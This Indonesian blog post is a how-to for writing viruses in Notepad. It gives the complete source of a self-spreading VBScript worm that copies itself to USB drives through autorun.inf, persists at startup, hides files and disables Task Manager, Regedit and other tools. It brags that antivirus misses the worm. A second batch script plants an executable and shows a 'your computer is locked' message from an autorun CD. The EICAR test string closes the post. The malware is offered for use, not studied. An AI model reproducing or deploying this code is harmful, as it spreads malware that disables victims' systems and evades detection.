Rabu, Mei 15, 2013
Unknown
Membuat Virus
dari Notepad
Berikut virus - virus sederhana yang dapat Anda buat hanya dengan
menggunakan notepad :
Virus ini di beri nama Kalong.VBS oleh penciptanya. Virus sederhana dengan
menggunakan notepad. Buka notepad-nya. Silahkan Copy kode pada kolom di bawah
ini. ‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus–//
Code:
on error
resume next
‘//–Dim
kata-kata berikut ini–//
dim
rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah
teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi =
“[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs =
createobject(“Scripting.FileSystemObject”)
set mf =
fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check =
mf.drive.drivetype
set text =
mf.openastextstream(1,-2)
do while not
text.atendofstream
rekur = rekur
& text.readline
rekur = rekur
& vbcrlf
loop
do
‘//–Copy diri
untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath
= fs.getspecialfolder(0)
set tf =
fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes
= 32
set
tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write
rekursif
tf.close
set tf =
fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes
= 39
‘//–Buat
Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke
setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each
flashdrive in fs.drives
‘//–Cek
Drive–//
If (flashdrive.drivetype
= 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat
Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set
tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes
=32
set
tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write
rekursif
tf.close
set
tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes
= 39
‘//–Buat
Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf
=fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes
= 32
set
tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf =
fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi
Registry–//
set kalong =
createobject(“WScript.Shell”)
‘//–Manip –
Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite
“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”
THE KALONG v.s. ZAY “
‘//–Manip –
Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”
‘//–Manip –
Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task
Manager–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,
“1″, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,
“1″, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,
“1″, “REG_DWORD”
‘//–Manip –
Disable klik kanan–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”
‘//–Manip –
Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,
“Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip –
Aktif setiap Windows Startup–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip –
Ubah RegisteredOwner dan Organization–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau
kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check
<> 1 then
Wscript.sleep
200000
end if
loop while
check <> 1
set sd =
createobject(“Wscript.shell”)
sd.run
windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari
Kode
Save code di Notepad dengan cara FILE >>
SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama :
k4l0n6.dll.vbs. Virus Worm ini, lebih bagus karena tidak terdeteksi pakai PCMAV
RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat
virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows
Original) juga bisa.
Virus ini efeknya tidak terlalu berbahaya. efek dari virus ini hanya
mengganti tampilan dari windows saja. Tapi sedikit bikin kaget juga, karena
hampir tidak terdeteksi oleh Anti Virus. Virus ini hanya aktif dan bisa bekerja
pada Windows XP. caranya? Buka notepad lalu copy paste dan di edit terlebih
dulu script di bawah ini :
Code:
@echo off
copy
image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy
image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\
/y
copy
image_name(terserah dari nama file gambar pembuat).bmp
%systemdrive%\WINDOWS\system32\ /y
copy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau
file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau
file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\
/y
copy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau
file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\system32\ /y
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v
LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v
LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS
LOCKED(pesan pembuat)” /f
reg add
“HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add
“HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add
“HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang
dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan
file terserah pembuat).exe /f
reg add
“HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna
RGB lain,cari pake Adobe Photoshop) /f
Lalu di SAVE AS ALL FILES dengan exstensi .bat misal : nama_file.bat.
Kemudian buat Autorun.inf dengan script :
Code:
[autorun]
open=nama_file.bat
Lalu SAVE AS ALL FILES dengan exstensi .inf
(Autorun.inf). File - file tersebut harus dalam 1 direktori, lalu seleksi file
- file tersebut, klik kanan PROPERTIES beri tanda check pada HIDDEN dan
READ-ONLY, copy file-file tersebut ke CD dan nikmati efeknya.
Virus yang terakhir hanyalah sekedar pengetes Anti Virus Anda. Ini adalah
script sederhana (virus ringan katakanlah) buat sekedar ngetes antivirus. Saat
disimpan kalo tidak terjadi apa - apa, berarti memang antivirus itu teramat
jelek maka perlu diganti.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Copy paste source code diatas ke notepad abis itu coba simpan dengan nama
apa saja terserah Anda
0 komentar:
Posting Komentar